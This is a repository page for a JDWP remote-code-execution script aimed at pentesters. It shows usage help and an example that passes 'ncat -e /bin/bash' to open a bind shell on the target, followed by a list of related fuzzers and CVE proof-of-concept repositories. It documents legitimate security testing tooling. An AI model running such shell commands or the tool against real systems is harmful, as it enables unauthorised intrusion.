• Stars
    star
    815
  • Rank 55,942 (Top 2 %)
  • Language
    Python
  • License
    MIT License
  • Created over 10 years ago
  • Updated 10 months ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

JDWP exploitation script

What is it ?

This exploitation script is meant to be used by pentesters against active JDWP service, in order to gain Remote Code Execution.

How does it work ?

Well, in a pretty standard way, the script only requires a Python 2 interpreter:

% python ./jdwp-shellifier.py -h
usage: jdwp-shellifier.py [-h] -t IP [-p PORT] [--break-on JAVA_METHOD]
                      [--cmd COMMAND]

Universal exploitation script for JDWP by @_hugsy_

optional arguments:
-h, --help            show this help message and exit
-t IP, --target IP    Remote target IP (default: None)
-p PORT, --port PORT  Remote target port (default: 8000)
--break-on JAVA_METHOD
Specify full path to method to break on (default:
	java.net.ServerSocket.accept)
	--cmd COMMAND         Specify full path to method to break on (default:
		None)

To target a specific host/port:

$ python ./jdwp-shellifier.py -t my.target.ip -p 1234

This command will only inject Java code on the JVM and show some info like Operating System, Java version. Since it does not execute external code/binary, it is totally safe and can be used as Proof-Of-Concept

$ python ./jdwp-shellifier.py -t my.target.ip -p 1234 --cmd "ncat -v -l -p 1234 -e /bin/bash"

This command will actually execute the process ncat with the specified argument with the rights given to the running JVM.

Before sending questions, make sure to read http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html for full understanding of the JDWP protocol.

Thanks

  • Ilja Van Sprundel
  • Sebastien Macke

More Repositories

1

XDiFF

Extended Differential Fuzzing Framework
Python
320
star
2

RepoSsessed

A project designed to parse public source code repositories and find various types of vulnerabilities.
Shell
188
star
3

laf

This project intends to provide a series of tools to craft, parse, send, analyze and crack a set of LoRaWAN packets in order to audit or pentest the security of a LoraWAN infrastructure.
Python
167
star
4

Platbox

UEFI and SMM Assessment Tool
Python
161
star
5

I-know-where-your-page-lives

I Know Where Your Page Lives: Derandomizing the latest Windows 10 Kernel - ZeroNights 2016
C++
157
star
6

Melkor_ELF_Fuzzer

Melkor is a very intuitive and easy-to-use ELF file format fuzzer to find functional and security bugs in ELF parsers.
C
148
star
7

FuzzNDIS

A Fuzzer for Windows NDIS Drivers OID Handlers
C
91
star
8

kmdf_re

Helper idapython code for reversing kmdf drivers
C
66
star
9

BlueCrawl

Frida (Android) Script for extracting bluetooth information
JavaScript
59
star
10

FileFormatFuzzing

C
39
star
11

AOSP-DownloadProviderDbDumperSQLiWhere

PoC Exploiting SQL Injection in Android's Download Provider in Selection Parameter (CVE-2019-2198)
Java
32
star
12

AOSP-ExploitUserDictionary

PoC Exploit for AOSP UserDictionary Content Provider (CVE-2018-9375)
Java
21
star
13

SearchAndCollect

search and collect windows files from multiple locations on machine and store in one centralized directory
C
20
star
14

AOSP-DownloadProviderHijacker

PoC Exploiting Permission Bypass in Android's Download Provider (CVE-2018-9468)
Java
18
star
15

AutoGadgetFS

USB testing framework
Python
15
star
16

BurpJDSer-ng

Allows you to deserialize java objects to XML and lets you dynamically load classes/jars as needed
Java
15
star
17

uefi_research

A repository with UEFI research stuff
13
star
18

Embedded-Defense

Sample embedded defense code for applications written in .NET, Java, PHP and Python.
JavaScript
11
star
19

PinguCrew

Python
9
star
20

Paddo

Framework for auditing and conducting "padding oracle" attacks
Python
8
star
21

AOSP-DownloadProviderDbDumper

PoC Exploiting SQL Injection in Android's Download Provider (CVE-2018-9493)
Java
7
star
22

BlackHat_2017

Materials for "Go Nuclear: Breaking Radiation Monitoring Devices"
C
6
star
23

AOSP-DownloadProviderHeadersDumper

PoC Exploiting Headers Disclosure in Android's Download Provider (CVE-2018-9546)
Java
6
star
24

NexusTacos

A vulnerability in the SNMP module of NX-OS could allow an unauthenticated, remote attacker to disclose potentially sensitive information.
Python
5
star
25

FileSquattingExample

FileSquatting Exploitation by Example
C
5
star
26

HL7-Fuzzer

An HL7 message fuzzer ( client and server )
Python
4
star
27

rubenBlackHat2018

Last Call For Satcom Security Materials
C
3
star
28

AOSP-DownloadProviderDbDumperSQLiLimit

PoC Exploiting SQL Injection in Android's Download Provider in Sort Parameter (CVE-2019-2196)
Java
2
star